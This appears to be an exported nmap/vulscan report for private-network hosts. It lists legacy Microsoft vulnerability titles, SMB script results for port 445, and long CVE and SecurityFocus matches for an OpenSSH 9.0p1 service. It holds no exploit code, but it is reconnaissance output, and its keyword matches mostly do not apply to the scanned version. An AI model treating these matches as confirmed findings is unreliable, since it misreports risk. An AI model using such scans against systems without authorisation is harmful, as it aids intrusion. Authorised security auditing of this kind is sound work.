Content-Type Header DoS [1930] Microsoft IIS SSI ssinc.dll Filename Handling Overflow [1927] Window Maker wmaker Long Windows Title overflow [1902] Microsoft Outlook View ActiveX Arbitrary Command Execution [1867] Microsoft Word Document Macro Execution [1864] Microsoft SQL Server Administrator Cached Connection [1856] Microsoft Exchange OWA Embedded Script Execution [1852] Microsoft Outlook Address Book Spoofing Weakness [1838] Microsoft Word .asd Macro File Execution [1837] Microsoft Word RTF Template Macro Execution [1832] Microsoft IE Spoofed SSL Certificates [1831] Microsoft IE Server Certificate Validation Failure [1826] Microsoft IIS Domain Guest Account Disclosure [1824] Microsoft IIS FTP DoS [1820] Microsoft Index Server Search Parameter Overflow [1819] Windows 2000 Kerberos LSA Memory Leak/DoS [1804] Microsoft IIS Long Request Parsing Remote DoS [1789] Microsoft ISA Server Web Proxy Malformed HTTP Request Parsing Remote DoS [1770] Microsoft IIS WebDAV Malformed PROPFIND Request Remote DoS [1750] Microsoft IIS File Fragment Disclosure [1724] Microsoft Web Client Extender NTLM Credential Disclosure [1685] Microsoft IE .lnk/.url Arbitrary Command Execution [1650] Microsoft Exchange Server EUSR_EXSTOREEVENT Default Account [1609] Microsoft NetMeeting Remote Desktop Sharing Malformed String Handling DoS [1606] Microsoft IE Cached Web Credentials Disclosure [1568] CiscoSecure ACS for Windows CSAdmin Login Overflow DoS [1553] Microsoft WebTV annclist.exe Malformed UDP Packet Parsing Remote DoS [1543] Microsoft NT/IIS Invalid URL Request DoS [1537] Microsoft Outlook Rich Text Format Information Disclosure [1530] Microsoft Money Cleartext Password Storage [1510] Microsoft IE Folder.htt Modification Privilege Escalation [1505] Microsoft Word Mail Merge Arbitrary Command Execution [1504] Microsoft IIS File Permission Canonicalization Bypass [1502] Microsoft IE Scriptlet Rendering [1500] Microsoft Word / Excel / Powerpoint 2000 Object Tag Buffer Overflow [1477] Windows NT FTP Server (WFTP) STAT/LIST Command Parsing Remote DoS [1475] Microsoft Outlook/Express Cache Bypass [1467] Microsoft Outlook/Express GMT Field Buffer Overflow [1465] Microsoft IIS .htr Missing Variable DoS [1464] Microsoft IE/Outlook DHTMLED / IFRAME Arbitrary File Access [1461] Microsoft Enterprise Manager DTS Package Password Disclosure [1455] Microsoft Excel REGISTER.ID Function Arbitrary Code Execution [1451] Microsoft SQL Server Stored Procedure Local Permission Restriction Bypass [1428] Microsoft IE/Office ActiveX Object Execution [1427] Microsoft IE VBA Code Execution [1378] Microsoft IE SSL Certificates Validation Failure (v1) [1369] Microsoft SQL Server DTS Password Disclosure [1368] Microsoft Media Encoder Request Parsing Local DoS [1342] Microsoft IE DocumentComplete() Cross Frame Access [1341] Microsoft IE ActiveX Combined Component Attributes [1328] Microsoft Office 2000 UA Control ActiveX (Ouactrl.ocx) Show Me Function Remote Code Execution [1326] Microsoft IE Crafted URL Cross Domain Cookie Disclosure [1325] Microsoft IIS Malformed Filename Request File Fragment Disclosure [1322] Microsoft IIS Malformed .htr Request DoS [1281] Microsoft IIS Escaped Character Saturation Remote DoS [1272] Microsoft Excel XLM Arbitrary Macro Execution [1261] Microsoft IIS Chunked Transfer Encoding Remote Overflow DoS [1250] Microsoft SQL Server Non-Validated Query [1244] Microsoft Clip Art Buffer Overflow [1210] Microsoft IIS WebHits.dll ISAPI Filter Traversal Arbitrary File Access [1209] Microsoft Terminal Server rdisk Registry Information Disclosure [1208] Microsoft East Asian Word Conversion Document Arbitrary Command Execution [1207] Microsoft SMS Remote Control Weak Permission Privilege Escalation [1188] Microsoft CIS IMAP Server Remote Overflow [1170] Microsoft IIS Escape Character URL Access Bypass [1156] Microsoft IE MSDXM.OCX vnd.ms.radio URL Handling Overflow [1152] Microsoft IE Web Proxy Auto-Discovery Unauthorized Proxy Reconfiguration [1145] Microsoft IE Offline Browsing Pack Task Scheduler [1143] Microsoft SQL Server TDS Header NULL Data Handling Remote DoS [1139] Microsoft Rich Text Format (RTF) Reader Malformed Control Word Overflow [1130] Windows NT FTP Server (WFTP) MKD/CWD Nested Command Remote Overflow [1083] Microsoft IIS FTP NO ACCESS Read/Delete File [1082] Microsoft IIS Domain Resolution Access Bypass [1069] Microsoft IE Import/Export Favorites [1056] Microsoft Java Virtual Machine Sandbox Bypass [1054] Microsoft IE scriptlet.typelib ActiveX Arbitrary Command Execution [1052] Microsoft Jet Database Text I-ISAM Arbitrary File Modification [1041] Microsoft IIS Malformed HTTP Request Header DoS [1032] Microsoft FrontPage PWS GET Request Handling Remote DoS [1031] Microsoft Exchange Server Encapsulated SMTP Address Open Relay [1020] Microsoft IIS ISAPI GetExtensionVersion() Privilege Escalation [1019] Microsoft Taskpads Feature Arbitrary Script Injection [956] Windows NT RAS Phonebook Overflow [946] Windows NT KnownDLLs Modification Privilege Escalation [930] Microsoft IIS Shared ASP Cache Information Disclosure [929] Microsoft IIS FTP Server NLST Command Overflow [928] Microsoft IIS Long Request Log Evasion [925] Microsoft Excel 97 CALL Arbitrary Command Execution [922] Microsoft NetMeeting Clipboard Remote Overflow [878] Microsoft SQL Resolution Service Keep-Alive Function DoS [866] Microsoft Remote Data Protocol (RDP) Implementation Cryptographic Information Disclosure [863] Microsoft Exchange Malformed Mail Attribute DoS [852] Microsoft Exchange EHLO Long Hostname Overflow [831] Microsoft Site Server LDAP_Anonymous Account Default Password [827] PHP4 for Apache on Windows php.exe Malformed Request Path Disclosure [815] Microsoft IIS ASP.NET trace.axd Application Tracing Information Disclosure [814] Microsoft IIS global.asa Remote Information Disclosure [782] Microsoft IIS / Site Server codebrws.asp Arbitrary File Access [771] Microsoft IIS Hosting Process (dllhost.exe) Out of Process Application Unspecified Privilege Escalation [768] Microsoft IIS ASP Chunked Encoding Heap Overflow [763] Microsoft IE VBScript Mis-Handling Arbitrary File Access [687] Multiple Vendor FTPD on Windows Floppy Request CPU Consumption DoS [685] Cisco PIX Firewall Manager (PFM) on Windows Web Interface Traversal Arbitrary File Access [636] Microsoft IIS sqlqhit.asp Sample Script CiScope Parameter Information Disclosure [630] Microsoft IIS Multiple Malformed Header Field Internal IP Address Disclosure [626] Microsoft Exchange OWA fumsg.asp Global Address List (GAL) Disclosure [601] Microsoft Exchange Server LDAP Bind Function Overflow [574] OpenWindows winselection Race Condition Privileged Content Disclosure [568] Microsoft IIS idq.dll IDA/IDQ ISAPI Remote Overflow [564] Microsoft IIS ISM.dll Fragmented Source Disclosure [558] Microsoft SQL Server 0x02 Packet Remote Information Disclosure [556] Microsoft IIS/PWS Encoded Filename Arbitrary Command Execution [553] Microsoft Index Server Malformed Search Arbitrary Server-side Include File Access [531] Microsoft SQL Server Registry Key Permission Weakness Privilege Escalation [525] Microsoft IIS Webserver Invalid Filename Request Arbitrary Command Execution [516] Microsoft Point-to-Point Tunneling Protocol (PPTP) Encryption Weakness [482] Microsoft IIS FrontPage Server Extensions (FPSE) Malformed Form DoS [475] Microsoft IIS bdir.htr Arbitrary Directory Listing [474] Microsoft IIS / Site Server viewcode.asp Arbitrary File Access [473] Microsoft IIS Multiple .cnf File Information Disclosure [471] Microsoft IIS ServerVariables_Jscript.asp Path Disclosure [470] Microsoft IIS Form_JScript.asp XSS [463] Microsoft IIS Phone Book Service /pbserver/pbserver.dll Remote Overflow [457] Microsoft Exchange Malformed MIME Header DoS [436] Microsoft IIS Unicode Remote Command Execution [425] Microsoft IIS WebDAV SEARCH Method Arbitrary Directory Forced Listing [414] OpenWindows ttyselection Race Condition Privileged Content Disclosure [396] Microsoft FrontPage shtml.exe MS-DOS Device Name Request DoS [391] Microsoft IIS IDA/IDQ Document Root Path Disclosure [390] Microsoft IIS Translate f: Request ASP Source Disclosure [386] Windows NT FTP Server (WFTP) Unauthenticated MLST Command Remote DoS [384] Windows 2000 Service Control Manager Named Pipe Impersonation [380] MySQL Server on Windows Default Null Root Password [365] Windows NT FTP Server (WFTP) Out of Sequence RNTO Command Remote DoS [342] Apache HTTP Server for Windows Multiple Forward Slash Directory Listing [308] Microsoft IIS Malformed File Extension URL DoS [307] Microsoft FrontPage 2000 Server Extensions shtml.exe Path Disclosure [285] Microsoft IIS repost.asp File Upload [284] Microsoft IIS IISADMPWD Virtual Directory Information Enumeration [283] Microsoft IIS /iissamples Multiple Sample Scripts Installed [282] Microsoft FrontPage dvwssr.dll Backdoor and Overflow [277] Microsoft IIS / PWS %2e Request ASP Source Disclosure [276] Microsoft IIS ASP::$DATA Stream Request ASP Source Disclosure [275] Microsoft IIS newdsn.exe Remote Arbitrary File Creation [274] Microsoft IIS ctss.idc ODBC Sample Arbitrary Command Execution [273] Microsoft IIS Upgrade ism.dll Local Privilege Escalation [272] Microsoft IIS MDAC RDS Arbitrary Remote Command Execution [271] Microsoft IIS WebHits null.htw .asp Source Disclosure [241] Windows NT FTP Server (WFTP) Unpassworded Guest Account [111] Microsoft Personal Web Server Multiple Dot Request Arbitrary File Access [98] Microsoft IIS perl.exe HTTP Path Disclosure [97] Microsoft IIS ISM.DLL HTR Request Overflow [96] Microsoft IIS idq.dll Traversal Arbitrary File Access [68] Microsoft FrontPage Extensions .pwd File Permissions [67] Microsoft FrontPage Extension shtml.dll Anonymous Account Information Disclosure [7] Microsoft IIS / Site Server showcode.asp source Parameter Traversal Arbitrary File Access [4] Microsoft IIS ExAir advsearch.asp Direct Request Remote DoS [3] Microsoft IIS ExAir query.asp Direct Request Remote DoS [2] Microsoft IIS ExAir search.asp Direct Request DoS
445	tcp	open	microsoft-ds	syn-ack

Host Script Output

Script Name	Output
smb-vuln-ms10-054	false
samba-vuln-cve-2012-1182	Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
smb-vuln-ms10-061	Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

Misc Metrics (click to expand)

192.168.2.21(online)

Address

192.168.2.21 (ipv4)

Ports

The 999 ports scanned but not shown below are in state: closed

999 ports replied with: reset

Port

State (toggle closed [0] | filtered [0])

Service

Reason

Product

Version

Extra info

tcp

open

ssh

syn-ack

OpenSSH

9.0p1 Debian 1

protocol 2.0

vulscan

VulDB - https://vuldb.com:
[92825] Oracle Communications Policy Management up to 9.7.3/9.9.1/10.4.1/12.1.1 OpenSSH privilege escalation

MITRE CVE - https://cve.mitre.org:
[CVE-2012-6067] freeFTPd.exe in freeFTPd through 1.0.11 allows remote attackers to bypass authentication via a crafted SFTP session, as demonstrated by an OpenSSH client with modified versions of ssh.c and sshconnect2.c.
[CVE-2012-6066] freeSSHd.exe in freeSSHd through 1.2.6 allows remote attackers to bypass authentication via a crafted session, as demonstrated by an OpenSSH client with modified versions of ssh.c and sshconnect2.c.
[CVE-2012-5975] The SSH USERAUTH CHANGE REQUEST feature in SSH Tectia Server 6.0.4 through 6.0.20, 6.1.0 through 6.1.12, 6.2.0 through 6.2.5, and 6.3.0 through 6.3.2 on UNIX and Linux, when old-style password authentication is enabled, allows remote attackers to bypass authentication via a crafted session involving entry of blank passwords, as demonstrated by a root login session from a modified OpenSSH client with an added input_userauth_passwd_changereq call in sshconnect2.c.
[CVE-2012-5536] A certain Red Hat build of the pam_ssh_agent_auth module on Red Hat Enterprise Linux (RHEL) 6 and Fedora Rawhide calls the glibc error function instead of the error function in the OpenSSH codebase, which allows local users to obtain sensitive information from process memory or possibly gain privileges via crafted use of an application that relies on this module, as demonstrated by su and sudo.
[CVE-2012-0814] The auth_parse_options function in auth-options.c in sshd in OpenSSH before 5.7 provides debug messages containing authorized_keys command options, which allows remote authenticated users to obtain potentially sensitive information by reading these messages, as demonstrated by the shared user account required by Gitolite.  NOTE: this can cross privilege boundaries because a user account may intentionally have no shell or filesystem access, and therefore may have no supported way to read an authorized_keys file in its own home directory.
[CVE-2011-5000] The ssh_gssapi_parse_ename function in gss-serv.c in OpenSSH 5.8 and earlier, when gssapi-with-mic authentication is enabled, allows remote authenticated users to cause a denial of service (memory consumption) via a large value in a certain length field.  NOTE: there may be limited scenarios in which this issue is relevant.
[CVE-2011-0539] The key_certify function in usr.bin/ssh/key.c in OpenSSH 5.6 and 5.7, when generating legacy certificates using the -t command-line option in ssh-keygen, does not initialize the nonce field, which might allow remote attackers to obtain sensitive stack memory contents or make it easier to conduct hash collision attacks.
[CVE-2010-5107] The default configuration of OpenSSH through 6.1 enforces a fixed time limit between establishing a TCP connection and completing a login, which makes it easier for remote attackers to cause a denial of service (connection-slot exhaustion) by periodically making many new TCP connections.
[CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632.
[CVE-2010-4478] OpenSSH 5.6 and earlier, when J-PAKE is enabled, does not properly validate the public parameters in the J-PAKE protocol, which allows remote attackers to bypass the need for knowledge of the shared secret, and successfully authenticate, by sending crafted values in each round of the protocol, a related issue to CVE-2010-4252.
[CVE-2009-2904] A certain Red Hat modification to the ChrootDirectory feature in OpenSSH 4.8, as used in sshd in OpenSSH 4.3 in Red Hat Enterprise Linux (RHEL) 5.4 and Fedora 11, allows local users to gain privileges via hard links to setuid programs that use configuration files within the chroot directory, related to requirements for directory ownership.
[CVE-2008-4109] A certain Debian patch for OpenSSH before 4.3p2-9etch3 on etch
[CVE-2008-3844] Certain Red Hat Enterprise Linux (RHEL) 4 and 5 packages for OpenSSH, as signed in August 2008 using a legitimate Red Hat GPG key, contain an externally introduced modification (Trojan Horse) that allows the package authors to have an unknown impact.  NOTE: since the malicious packages were not distributed from any official Red Hat sources, the scope of this issue is restricted to users who may have obtained these packages through unofficial distribution points.  As of 20080827, no unofficial distributions of this software are known.
[CVE-2008-3259] OpenSSH before 5.1 sets the SO_REUSEADDR socket option when the X11UseLocalhost configuration setting is disabled, which allows local users on some platforms to hijack the X11 forwarding port via a bind to a single IP address, as demonstrated on the HP-UX platform.
[CVE-2008-3234] sshd in OpenSSH 4 on Debian GNU/Linux, and the 20070303 OpenSSH snapshot, allows remote authenticated users to obtain access to arbitrary SELinux roles by appending a :/ (colon slash) sequence, followed by the role name, to the username.
[CVE-2008-1657] OpenSSH 4.4 up to versions before 4.9 allows remote authenticated users to bypass the sshd_config ForceCommand directive by modifying the .ssh/rc session file.
[CVE-2008-1483] OpenSSH 4.3p2, and probably other versions, allows local users to hijack forwarded X connections by causing ssh to set DISPLAY to :10, even when another process is listening on the associated port, as demonstrated by opening TCP port 6010 (IPv4) and sniffing a cookie sent by Emacs.
[CVE-2007-6415] scponly 4.6 and earlier allows remote authenticated users to bypass intended restrictions and execute arbitrary code by invoking scp, as implemented by OpenSSH, with the -F and -o options.
[CVE-2007-5715] DenyHosts 2.6 processes OpenSSH sshd "not listed in AllowUsers" log messages with an incorrect regular expression that does not match an IP address, which might allow remote attackers to avoid detection and blocking when making invalid login attempts with a username not present in AllowUsers, as demonstrated by the root username, a different vulnerability than CVE-2007-4323.
[CVE-2007-4752] ssh in OpenSSH before 4.7 does not properly handle when an untrusted cookie cannot be created and uses a trusted X11 cookie instead, which allows attackers to violate intended policy and gain privileges by causing an X client to be treated as trusted.
[CVE-2007-4654] Unspecified vulnerability in SSHield 1.6.1 with OpenSSH 3.0.2p1 on Cisco WebNS 8.20.0.1 on Cisco Content Services Switch (CSS) series 11000 devices allows remote attackers to cause a denial of service (connection slot exhaustion and device crash) via a series of large packets designed to exploit the SSH CRC32 attack detection overflow (CVE-2001-0144), possibly a related issue to CVE-2002-1024.
[CVE-2007-3102] Unspecified vulnerability in the linux_audit_record_event function in OpenSSH 4.3p2, as used on Fedora Core 6 and possibly other systems, allows remote attackers to write arbitrary characters to an audit log via a crafted username.  NOTE: some of these details are obtained from third party information.
[CVE-2007-2768] OpenSSH, when using OPIE (One-Time Passwords in Everything) for PAM, allows remote attackers to determine the existence of certain user accounts, which displays a different response if the user account exists and is configured to use one-time passwords (OTP), a similar issue to CVE-2007-2243.
[CVE-2007-2243] OpenSSH 4.6 and earlier, when ChallengeResponseAuthentication is enabled, allows remote attackers to determine the existence of user accounts by attempting to authenticate via S/KEY, which displays a different response if the user account exists, a similar issue to CVE-2001-1483.
[CVE-2007-0726] The SSH key generation process in OpenSSH in Apple Mac OS X 10.3.9 and 10.4 through 10.4.8 allows remote attackers to cause a denial of service by connecting to the server before SSH has finished creating keys, which causes the keys to be regenerated and can break trust relationships that were based on the original keys.
[CVE-2006-5794] Unspecified vulnerability in the sshd Privilege Separation Monitor in OpenSSH before 4.5 causes weaker verification that authentication has been successful, which might allow attackers to bypass authentication. NOTE: as of 20061108, it is believed that this issue is only exploitable by leveraging vulnerabilities in the unprivileged process, which are not known to exist.
[CVE-2006-5229] OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms and versions, and possibly under limited configurations, allows remote attackers to determine valid usernames via timing discrepancies in which responses take longer for valid usernames than invalid ones, as demonstrated by sshtime.  NOTE: as of 20061014, it appears that this issue is dependent on the use of manually-set passwords that causes delays when processing /etc/shadow due to an increased number of rounds.
[CVE-2006-5052] Unspecified vulnerability in portable OpenSSH before 4.4, when running on some platforms, allows remote attackers to determine the validity of usernames via unknown vectors involving a GSSAPI "authentication abort."
[CVE-2006-5051] Signal handler race condition in OpenSSH before 4.4 allows remote attackers to cause a denial of service (crash), and possibly execute arbitrary code if GSSAPI authentication is enabled, via unspecified vectors that lead to a double-free.
[CVE-2006-4925] packet.c in ssh in OpenSSH allows remote attackers to cause a denial of service (crash) by sending an invalid protocol sequence with USERAUTH_SUCCESS before NEWKEYS, which causes newkeys[mode] to be NULL.
[CVE-2006-4924] sshd in OpenSSH before 4.4, when using the version 1 SSH protocol, allows remote attackers to cause a denial of service (CPU consumption) via an SSH packet that contains duplicate blocks, which is not properly handled by the CRC compensation attack detector.
[CVE-2006-0883] OpenSSH on FreeBSD 5.3 and 5.4, when used with OpenPAM, does not properly handle when a forked child process terminates during PAM authentication, which allows remote attackers to cause a denial of service (client connection refusal) by connecting multiple times to the SSH server, waiting for the password prompt, then disconnecting.
[CVE-2006-0393] OpenSSH in Apple Mac OS X 10.4.7 allows remote attackers to cause a denial of service or determine account existence by attempting to log in using an invalid user, which causes the server to hang.
[CVE-2006-0225] scp in OpenSSH 4.2p1 allows attackers to execute arbitrary commands via filenames that contain shell metacharacters or spaces, which are expanded twice.
[CVE-2005-2798] sshd in OpenSSH before 4.2, when GSSAPIDelegateCredentials is enabled, allows GSSAPI credentials to be delegated to clients who log in using non-GSSAPI methods, which could cause those credentials to be exposed to untrusted users or hosts.
[CVE-2005-2797] OpenSSH 4.0, and other versions before 4.2, does not properly handle dynamic port forwarding ("-D" option) when a listen address is not provided, which may cause OpenSSH to enable the GatewayPorts functionality.
[CVE-2005-2666] SSH, as implemented in OpenSSH before 4.0 and possibly other implementations, stores hostnames, IP addresses, and keys in plaintext in the known_hosts file, which makes it easier for an attacker that has compromised an SSH user's account to generate a list of additional targets that are more likely to have the same password or key.
[CVE-2004-2760] sshd in OpenSSH 3.5p1, when PermitRootLogin is disabled, immediately closes the TCP connection after a root login attempt with the correct password, but leaves the connection open after an attempt with an incorrect password, which makes it easier for remote attackers to guess the password by observing the connection state, a different vulnerability than CVE-2003-0190.  NOTE: it could be argued that in most environments, this does not cross privilege boundaries without requiring leverage of a separate vulnerability.
[CVE-2004-2414] Novell NetWare 6.5 SP 1.1, when installing or upgrading using the Overlay CDs and performing a custom installation with OpenSSH, includes sensitive password information in the (1) NIOUTPUT.TXT and (2) NI.LOG log files, which might allow local users to obtain the passwords.
[CVE-2004-2069] sshd.c in OpenSSH 3.6.1p2 and 3.7.1p2 and possibly other versions, when using privilege separation, does not properly signal the non-privileged process when a session has been terminated after exceeding the LoginGraceTime setting, which leaves the connection open and allows remote attackers to cause a denial of service (connection consumption).
[CVE-2004-1653] The default configuration for OpenSSH enables AllowTcpForwarding, which could allow remote authenticated users to perform a port bounce, when configured with an anonymous access program such as AnonCVS.
[CVE-2004-0175] Directory traversal vulnerability in scp for OpenSSH before 3.4p1 allows remote malicious servers to overwrite arbitrary files.  NOTE: this may be a rediscovery of CVE-2000-0992.
[CVE-2003-1562] sshd in OpenSSH 3.6.1p2 and earlier, when PermitRootLogin is disabled and using PAM keyboard-interactive authentication, does not insert a delay after a root login attempt with the correct password, which makes it easier for remote attackers to use timing differences to determine if the password step of a multi-step authentication is successful, a different vulnerability than CVE-2003-0190.
[CVE-2003-0787] The PAM conversation function in OpenSSH 3.7.1 and 3.7.1p1 interprets an array of structures as an array of pointers, which allows attackers to modify the stack and possibly gain privileges.
[CVE-2003-0786] The SSH1 PAM challenge response authentication in OpenSSH 3.7.1 and 3.7.1p1, when Privilege Separation is disabled, does not check the result of the authentication attempt, which can allow remote attackers to gain privileges.
[CVE-2003-0695] Multiple "buffer management errors" in OpenSSH before 3.7.1 may allow attackers to cause a denial of service or execute arbitrary code using (1) buffer_init in buffer.c, (2) buffer_free in buffer.c, or (3) a separate function in channels.c, a different vulnerability than CVE-2003-0693.
[CVE-2003-0693] A "buffer management error" in buffer_append_space of buffer.c for OpenSSH before 3.7 may allow remote attackers to execute arbitrary code by causing an incorrect amount of memory to be freed and corrupting the heap, a different vulnerability than CVE-2003-0695.
[CVE-2003-0682] "Memory bugs" in OpenSSH 3.7.1 and earlier, with unknown impact, a different set of vulnerabilities than CVE-2003-0693 and CVE-2003-0695.
[CVE-2003-0386] OpenSSH 3.6.1 and earlier, when restricting host access by numeric IP addresses and with VerifyReverseMapping disabled, allows remote attackers to bypass "from=" and "user@host" address restrictions by connecting to a host from a system whose reverse DNS hostname contains the numeric IP address.
[CVE-2003-0190] OpenSSH-portable (OpenSSH) 3.6.1p1 and earlier with PAM support enabled immediately sends an error message when a user does not exist, which allows remote attackers to determine valid usernames via a timing attack.
[CVE-2002-0765] sshd in OpenSSH 3.2.2, when using YP with netgroups and under certain conditions, may allow users to successfully authenticate and log in with another user's password.
[CVE-2002-0640] Buffer overflow in sshd in OpenSSH 2.3.1 through 3.3 may allow remote attackers to execute arbitrary code via a large number of responses during challenge response authentication when OpenBSD is using PAM modules with interactive keyboard authentication (PAMAuthenticationViaKbdInt).
[CVE-2002-0639] Integer overflow in sshd in OpenSSH 2.9.9 through 3.3 allows remote attackers to execute arbitrary code during challenge response authentication (ChallengeResponseAuthentication) when OpenSSH is using SKEY or BSD_AUTH authentication.
[CVE-2002-0575] Buffer overflow in OpenSSH before 2.9.9, and 3.x before 3.2.1, with Kerberos/AFS support and KerberosTgtPassing or AFSTokenPassing enabled, allows remote and local authenticated users to gain privileges.
[CVE-2002-0083] Off-by-one error in the channel code of OpenSSH 2.0 through 3.0.2 allows local users or remote malicious servers to gain privileges.
[CVE-2001-1585] SSH protocol 2 (aka SSH-2) public key authentication in the development snapshot of OpenSSH 2.3.1, available from 2001-01-18 through 2001-02-08, does not perform a challenge-response step to ensure that the client has the proper private key, which allows remote attackers to bypass authentication as other users by supplying a public key from that user's authorized_keys file.
[CVE-2001-1507] OpenSSH before 3.0.1 with Kerberos V enabled does not properly authenticate users, which could allow remote attackers to login unchallenged.
[CVE-2001-1459] OpenSSH 2.9 and earlier does not initiate a Pluggable Authentication Module (PAM) session if commands are executed with no pty, which allows local users to bypass resource limits (rlimits) set in pam.d.
[CVE-2001-1382] The "echo simulation" traffic analysis countermeasure in OpenSSH before 2.9.9p2 sends an additional echo packet after the password and carriage return is entered, which could allow remote attackers to determine that the countermeasure is being used.
[CVE-2001-1380] OpenSSH before 2.9.9, while using keypairs and multiple keys of different types in the ~/.ssh/authorized_keys2 file, may not properly handle the "from" option associated with a key, which could allow remote attackers to login from unauthorized IP addresses.
[CVE-2001-1029] libutil in OpenSSH on FreeBSD 4.4 and earlier does not drop privileges before verifying the capabilities for reading the copyright and welcome files, which allows local users to bypass the capabilities checks and read arbitrary files by specifying alternate copyright or welcome files.
[CVE-2001-0872] OpenSSH 3.0.1 and earlier with UseLogin enabled does not properly cleanse critical environment variables such as LD_PRELOAD, which allows local users to gain root privileges.
[CVE-2001-0816] OpenSSH before 2.9.9, when running sftp using sftp-server and using restricted keypairs, allows remote authenticated users to bypass authorized_keys2 command= restrictions using sftp commands.
[CVE-2001-0572] The SSH protocols 1 and 2 (aka SSH-2) as implemented in OpenSSH and other packages have various weaknesses which can allow a remote attacker to obtain the following information via sniffing: (1) password lengths or ranges of lengths, which simplifies brute force password guessing, (2) whether RSA or DSA authentication is being used, (3) the number of authorized_keys in RSA authentication, or (4) the lengths of shell commands.
[CVE-2001-0529] OpenSSH version 2.9 and earlier, with X forwarding enabled, allows a local attacker to delete any file named 'cookies' via a symlink attack.
[CVE-2001-0361] Implementations of SSH version 1.5, including (1) OpenSSH up to version 2.3.0, (2) AppGate, and (3) ssh-1 up to version 1.2.31, in certain configurations, allow a remote attacker to decrypt and/or alter traffic via a "Bleichenbacher attack" on PKCS#1 version 1.5.
[CVE-2000-1169] OpenSSH SSH client before 2.3.0 does not properly disable X11 or agent forwarding, which could allow a malicious SSH server to gain access to the X11 display and sniff X11 events, or gain access to the ssh-agent.
[CVE-2000-0535] OpenSSL 0.9.4 and OpenSSH for FreeBSD do not properly check for the existence of the /dev/random or /dev/urandom devices, which are absent on FreeBSD Alpha systems, which causes them to produce weak keys which may be more easily broken.
[CVE-2000-0525] OpenSSH does not properly drop privileges when the UseLogin option is enabled, which allows local users to execute arbitrary commands by providing the command to the ssh daemon.
[CVE-1999-0661] A system is running a version of software that was replaced with a Trojan Horse at one of its distribution points, such as (1) TCP Wrappers 7.6, (2) util-linux 2.9g, (3) wuarchive ftpd (wuftpd) 2.2 and 2.1f, (4) IRC client (ircII) ircII 2.2.9, (5) OpenSSH 3.4p1, or (6) Sendmail 8.12.6.

SecurityFocus - https://www.securityfocus.com/bid/:
[102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities
[101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability
[94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability
[94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability
[94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability
[94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability
[93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability
[92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability
[92210] OpenSSH CBC Padding Weak Encryption Security Weakness
[92209] OpenSSH MAC Verification Security Bypass Vulnerability
[91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability
[90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability
[90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability
[89385] OpenSSH CVE-2005-2666 Local Security Vulnerability
[88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability
[88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability
[88367] OpenSSH CVE-1999-1010 Local Security Vulnerability
[87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability
[86187] OpenSSH 'session.c' Local Security Bypass Vulnerability
[86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability
[84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability
[84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability
[84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability
[81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability
[80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability
[80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability
[76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability
[76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities
[75990] OpenSSH Login Handling Security Bypass Weakness
[75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability
[71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability
[68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities
[66459] OpenSSH Certificate Validation Security Bypass Vulnerability
[66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability
[65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability
[65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability
[63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability
[61286] OpenSSH Remote Denial of Service Vulnerability
[58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability
[58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability
[54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability
[51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability
[50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability
[49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness
[48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability
[47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability
[46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
[45304] OpenSSH J-PAKE Security Bypass Vulnerability
[36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability
[32319] OpenSSH CBC Mode Information Disclosure Vulnerability
[30794] Red Hat OpenSSH Backdoor Vulnerability
[30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability
[30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability
[28531] OpenSSH ForceCommand Command Execution Weakness
[28444] OpenSSH X Connections Session Hijacking Vulnerability
[26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness
[25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability
[23601] OpenSSH S/Key Remote Information Disclosure Vulnerability
